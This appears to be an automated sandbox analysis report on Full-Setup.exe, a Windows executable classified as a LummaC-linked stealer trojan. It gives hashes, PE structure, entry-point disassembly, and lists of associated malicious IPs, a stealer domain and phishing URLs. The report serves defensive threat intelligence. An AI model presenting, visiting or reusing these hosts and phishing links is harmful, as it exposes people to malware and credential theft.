                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Full-Setup.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@3/0@2/1
                                                          EGA Information:
                                                          • Successful, ratio: 50%
                                                          HCA Information:
                                                          • Successful, ratio: 87%
                                                          • Number of executed functions: 15
                                                          • Number of non-executed functions: 100
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target Full-Setup.exe, PID 6564 because there are no executed function
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: Full-Setup.exe
                                                          TimeTypeDescription
                                                          18:49:17API Interceptor2x Sleep call for process: BitLockerToGo.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          104.21.4.136injector V2.4.exeGet hashmaliciousLummaCBrowse
                                                            FoS5cjKhd3.exeGet hashmaliciousLummaCBrowse
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                kewyIO69TI.exeGet hashmaliciousLummaCBrowse
                                                                  gZzI6gTYn4.exeGet hashmaliciousLummaCBrowse
                                                                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              gutterydhowi.shopfile.exeGet hashmaliciousLummaCBrowse
                                                                              • 172.67.132.32
                                                                              injector V2.4.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.4.136
                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                              • 172.67.132.32
                                                                              FoS5cjKhd3.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.4.136
                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.4.136
                                                                              kewyIO69TI.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.4.136
                                                                              gZzI6gTYn4.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.4.136
                                                                              U6b3tLFqN5.exeGet hashmaliciousLummaCBrowse
                                                                              • 172.67.132.32
                                                                              0UB3FIL25c.exeGet hashmaliciousLummaCBrowse
                                                                              • 172.67.132.32
                                                                              file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                              • 104.21.4.136
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUShttps://ardam.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 188.114.96.3
                                                                              http://krakennylog.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 104.16.117.116
                                                                              https://dappnoderestore.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 188.114.96.3
                                                                              http://nftpack83.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              http://coin-pro-base-login.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 172.64.147.209
                                                                              http://nfthit7.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 104.18.18.237
                                                                              https://server.h74w.com/invite/84350172Get hashmaliciousUnknownBrowse
                                                                              • 104.21.52.99
                                                                              http://sellerthirteen.eur-tiktokshop.com/Get hashmaliciousUnknownBrowse
                                                                              • 172.67.169.55
                                                                              https://sellerfourth.eur-tiktokshop.com/Get hashmaliciousUnknownBrowse
                                                                              • 172.67.169.55
                                                                              https://sellerfifteen.eur-tiktokshop.com/Get hashmaliciousUnknownBrowse
                                                                              • 172.67.169.55
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                              • 104.21.4.136
                                                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                              • 104.21.4.136
                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.4.136
                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                              • 104.21.4.136
                                                                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                                                              • 104.21.4.136
                                                                              Trjscan_[7MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.4.136
                                                                              Trjscan_[7MB]_[unsign].exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.4.136
                                                                              injector V2.4.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.4.136
                                                                              injector V2.4.exeGet hashmaliciousLummaCBrowse
                                                                              • 104.21.4.136
                                                                              Website_Redesign_Project.xlsGet hashmaliciousUnknownBrowse
                                                                              • 104.21.4.136
                                                                              No context
                                                                              No created / dropped files found
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):6.424819113229837
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Full-Setup.exe
                                                                              File size:16'855'552 bytes
                                                                              MD5:88a1c446d3d26bfdd2dde2029de24beb
                                                                              SHA1:ff8ffbbabdc7b4a9af03f9466656ec5167660fff
                                                                              SHA256:4f6c45165a60433a77d4fce2f5bf06216ef38af6ab7ab6c836aa9f8446de33ba
                                                                              SHA512:acfe518ce3936f417846d3b41ae6974ae70775cdbbb74acba4fc32d826508a0517063c6f4fa8bdfe084ceb3ba62ebef909191dcc9b7bf82f299714e562b7fb52
                                                                              SSDEEP:98304:cTR4ecSaE5IB4CDn/fp1b5t+KWaqZbutS/2UzMiMuS4Tfp21aUsvrZ27FSTSQLo9:DeXaEgT/xxqZbtQBu1rw1aUsvrsSmea
                                                                              TLSH:11074A41FAD740F9EA03583540ABB22F23345E098B29DBD7EB517E69F8772921C37249
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................n.........0.............@.......................................@................................
                                                                              Icon Hash:1f2d59f9795b3630
                                                                              Entrypoint:0x478830
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:1
                                                                              File Version Major:6
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:1aae8bf580c846f39c71c05898e57e88
                                                                              Instruction
                                                                              jmp 00007FC3FD1AB840h
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              sub esp, 28h
                                                                              mov dword ptr [esp+1Ch], ebx
                                                                              mov dword ptr [esp+10h], ebp
                                                                              mov dword ptr [esp+14h], esi
                                                                              mov dword ptr [esp+18h], edi
                                                                              mov dword ptr [esp], eax
                                                                              mov dword ptr [esp+04h], ecx
                                                                              call 00007FC3FD186BD6h
                                                                              mov eax, dword ptr [esp+08h]
                                                                              mov edi, dword ptr [esp+18h]
                                                                              mov esi, dword ptr [esp+14h]
                                                                              mov ebp, dword ptr [esp+10h]
                                                                              mov ebx, dword ptr [esp+1Ch]
                                                                              add esp, 28h
                                                                              retn 0004h
                                                                              ret
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              sub esp, 08h
                                                                              mov ecx, dword ptr [esp+0Ch]
                                                                              mov edx, dword ptr [ecx]
                                                                              mov eax, esp
                                                                              mov dword ptr [edx+04h], eax
                                                                              sub eax, 00010000h
                                                                              mov dword ptr [edx], eax
                                                                              add eax, 00000BA0h
                                                                              mov dword ptr [edx+08h], eax
                                                                              mov dword ptr [edx+0Ch], eax
                                                                              lea edi, dword ptr [ecx+34h]
                                                                              mov dword ptr [edx+18h], ecx
                                                                              mov dword ptr [edi], edx
                                                                              mov dword ptr [esp+04h], edi
                                                                              call 00007FC3FD1ADCA4h
                                                                              cld
                                                                              call 00007FC3FD1ACD2Eh
                                                                              call 00007FC3FD1AB969h
                                                                              add esp, 08h
                                                                              ret
                                                                              jmp 00007FC3FD1ADB50h
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              mov ebx, dword ptr [esp+04h]
                                                                              mov ebp, esp
                                                                              mov dword ptr fs:[00000034h], 00000000h
                                                                              mov ecx, dword ptr [ebx+04h]
                                                                              cmp ecx, 00000000h
                                                                              je 00007FC3FD1ADB51h
                                                                              mov eax, ecx
                                                                              shl eax, 02h
                                                                              sub esp, eax
                                                                              mov edi, esp
                                                                              mov esi, dword ptr [ebx+08h]
                                                                              cld
                                                                              rep movsd
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xea20000x44c.idata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xf010000x1483b7.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xea30000x5c494.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xdbbca00xb4.data
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x6e12780x6e1400c1589bd898347ae9fdf975824e9e62f7unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x6e30000x6d60500x6d6200ccbc903fc254b12fb30584580c0b79c1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xdba0000xe7e380xb66007c9b01e14a48067c49e8261e4f7f0b93False0.28818566869431117DIY-Thermocam raw data (Lepton 2.x), scale -28625-256, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 2147550208.0000006.006920045257039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .idata0xea20000x44c0x60081c29552de568a8c281117613be41c69False0.3587239583333333OpenPGP Public Key3.8717961577392512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .reloc0xea30000x5c4940x5c600dee4f66de3053b73bd0ddb507290e054False0.5382273342354533data6.625384593206442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              .symtab0xf000000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xf010000x1483b70x1484005c0a7688d4c1d45352a633f518d62e4cFalse0.2584171803598629data5.148589820359574IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0xf062080x7249PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedGermanGermany1.000546877670301
                                                                              RT_ICON0xf0d4540x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.24429460580912862
                                                                              RT_ICON0xf0f9fc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.29901500938086306
                                                                              RT_ICON0xf10aa40x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.35122950819672133
                                                                              RT_ICON0xf1142c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4175531914893617
                                                                              RT_ICON0xf118940x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.5310283687943262
                                                                              RT_ICON0xf11cfc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.30370544090056284
                                                                              RT_ICON0xf12da40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2121369294605809
                                                                              RT_ICON0xf1534c0x817cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedGermanGermany0.9963497043562206
                                                                              RT_ICON0xf1d4c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.23609958506224066
                                                                              RT_ICON0xf1fa700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.34310506566604126
                                                                              RT_ICON0xf20b180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3721311475409836
                                                                              RT_ICON0xf214a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.500886524822695
                                                                              RT_ICON0xf219080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2037344398340249
                                                                              RT_ICON0xf23eb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2976078799249531
                                                                              RT_ICON0xf24f580x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.33852459016393444
                                                                              RT_ICON0xf258e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.42109929078014185
                                                                              RT_ICON0xf25d480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.04823651452282158
                                                                              RT_ICON0xf282f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.07129455909943715
                                                                              RT_ICON0xf293980x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.09959016393442623
                                                                              RT_ICON0xf29d200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.1524822695035461
                                                                              RT_ICON0xf2a1880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.1787344398340249
                                                                              RT_ICON0xf2c7300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.18105065666041276
                                                                              RT_ICON0xf2d7d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.1918032786885246
                                                                              RT_ICON0xf2e1600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.2393617021276596
                                                                              RT_ICON0xf2e5c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.22437759336099586
                                                                              RT_ICON0xf30b700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.20309568480300189
                                                                              RT_ICON0xf31c180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.2266393442622951
                                                                              RT_ICON0xf325a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3342198581560284
                                                                              RT_ICON0xf32a080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2408713692946058
                                                                              RT_ICON0xf34fb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.23639774859287055
                                                                              RT_ICON0xf360580x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.2700819672131147
                                                                              RT_ICON0xf369e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3404255319148936
                                                                              RT_ICON0xf36e480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.11939834024896266
                                                                              RT_ICON0xf393f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.175422138836773
                                                                              RT_ICON0xf3a4980x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.23934426229508196
                                                                              RT_ICON0xf3ae200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3262411347517731
                                                                              RT_ICON0xf3b2880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.16524896265560166
                                                                              RT_ICON0xf3d8300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.18409943714821764
                                                                              RT_ICON0xf3e8d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3127049180327869
                                                                              RT_ICON0xf3f2600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.36524822695035464
                                                                              RT_ICON0xf3f6c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.25933609958506226
                                                                              RT_ICON0xf41c700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2450750469043152
                                                                              RT_ICON0xf42d180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.27049180327868855
                                                                              RT_ICON0xf436a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3971631205673759
                                                                              RT_ICON0xf43b080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.25
                                                                              RT_ICON0xf460b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.29831144465290804
                                                                              RT_ICON0xf471580x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.33975409836065573
                                                                              RT_ICON0xf47ae00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4299645390070922
                                                                              RT_ICON0xf47f480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2212655601659751
                                                                              RT_ICON0xf4a4f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.1850375234521576
                                                                              RT_ICON0xf4b5980x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.19344262295081968
                                                                              RT_ICON0xf4bf200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.2721631205673759
                                                                              RT_ICON0xf4c3880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.29553941908713693
                                                                              RT_ICON0xf4e9300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.3651500938086304
                                                                              RT_ICON0xf4f9d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.40491803278688526
                                                                              RT_ICON0xf503600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4015957446808511
                                                                              RT_ICON0xf507c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.10612033195020747
                                                                              RT_ICON0xf52d700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.1578330206378987
                                                                              RT_ICON0xf53e180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.18975409836065574
                                                                              RT_ICON0xf547a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.27393617021276595
                                                                              RT_ICON0xf54c080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.22987551867219916
                                                                              RT_ICON0xf571b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2861163227016886
                                                                              RT_ICON0xf582580x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.364344262295082
                                                                              RT_ICON0xf58be00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.45567375886524825
                                                                              RT_ICON0xf590480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.26908713692946057
                                                                              RT_ICON0xf5b5f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.23744813278008298
                                                                              RT_ICON0xf5db980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.20518672199170124
                                                                              RT_ICON0xf601400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2521106941838649
                                                                              RT_ICON0xf611e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.27909836065573773
                                                                              RT_ICON0xf61b700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3067375886524823
                                                                              RT_ICON0xf61fd80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.21939834024896265
                                                                              RT_ICON0xf645800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2652439024390244
                                                                              RT_ICON0xf656280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.30450819672131146
                                                                              RT_ICON0xf65fb00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3395390070921986
                                                                              RT_ICON0xf664180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.22354771784232366
                                                                              RT_ICON0xf689c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2830675422138837
                                                                              RT_ICON0xf69a680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.32581967213114754
                                                                              RT_ICON0xf6a3f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.35106382978723405
                                                                              RT_ICON0xf6a8580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2283195020746888
                                                                              RT_ICON0xf6ce000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.27650093808630394
                                                                              RT_ICON0xf6dea80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.32581967213114754
                                                                              RT_ICON0xf6e8300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3546099290780142
                                                                              RT_ICON0xf6ec980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2328838174273859
                                                                              RT_ICON0xf712400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2929174484052533
                                                                              RT_ICON0xf722e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3430327868852459
                                                                              RT_ICON0xf72c700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3829787234042553
                                                                              RT_ICON0xf730d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2337136929460581
                                                                              RT_ICON0xf756800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2978424015009381
                                                                              RT_ICON0xf767280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.34262295081967215
                                                                              RT_ICON0xf770b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.38120567375886527
                                                                              RT_ICON0xf775180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.19346473029045644
                                                                              RT_ICON0xf79ac00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.29713883677298314
                                                                              RT_ICON0xf7ab680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.36475409836065575
                                                                              RT_ICON0xf7b4f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4219858156028369
                                                                              RT_ICON0xf7b9580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.21410788381742737
                                                                              RT_ICON0xf7df000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.18667917448405252
                                                                              RT_ICON0xf7efa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.20614754098360655
                                                                              RT_ICON0xf7f9300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.2526595744680851
                                                                              RT_ICON0xf7fd980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.23558091286307054
                                                                              RT_ICON0xf823400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2052063789868668
                                                                              RT_ICON0xf833e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.25573770491803277
                                                                              RT_ICON0xf83d700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.324468085106383
                                                                              RT_ICON0xf841d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2187759336099585
                                                                              RT_ICON0xf867800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.22021575984990618
                                                                              RT_ICON0xf878280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.24795081967213115
                                                                              RT_ICON0xf881b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.300531914893617
                                                                              RT_ICON0xf886180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.21804979253112033
                                                                              RT_ICON0xf8abc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.25093808630394
                                                                              RT_ICON0xf8bc680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.2762295081967213
                                                                              RT_ICON0xf8c5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3262411347517731
                                                                              RT_ICON0xf8ca580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.23827800829875517
                                                                              RT_ICON0xf8f0000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.29174484052532834
                                                                              RT_ICON0xf900a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3319672131147541
                                                                              RT_ICON0xf90a300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4166666666666667
                                                                              RT_ICON0xf90e980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.27282157676348545
                                                                              RT_ICON0xf934400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2929174484052533
                                                                              RT_ICON0xf944e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3442622950819672
                                                                              RT_ICON0xf94e700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4228723404255319
                                                                              RT_ICON0xf952d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2629668049792531
                                                                              RT_ICON0xf978800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.30347091932457787
                                                                              RT_ICON0xf989280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3377049180327869
                                                                              RT_ICON0xf992b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4592198581560284
                                                                              RT_ICON0xf997180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.26867219917012447
                                                                              RT_ICON0xf9bcc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.3227016885553471
                                                                              RT_ICON0xf9cd680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3590163934426229
                                                                              RT_ICON0xf9d6f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.475177304964539
                                                                              RT_ICON0xf9db580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.26690871369294605
                                                                              RT_ICON0xfa01000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.3201219512195122
                                                                              RT_ICON0xfa11a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.35942622950819675
                                                                              RT_ICON0xfa1b300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4645390070921986
                                                                              RT_ICON0xfa1f980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2657676348547718
                                                                              RT_ICON0xfa45400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.31308630393996245
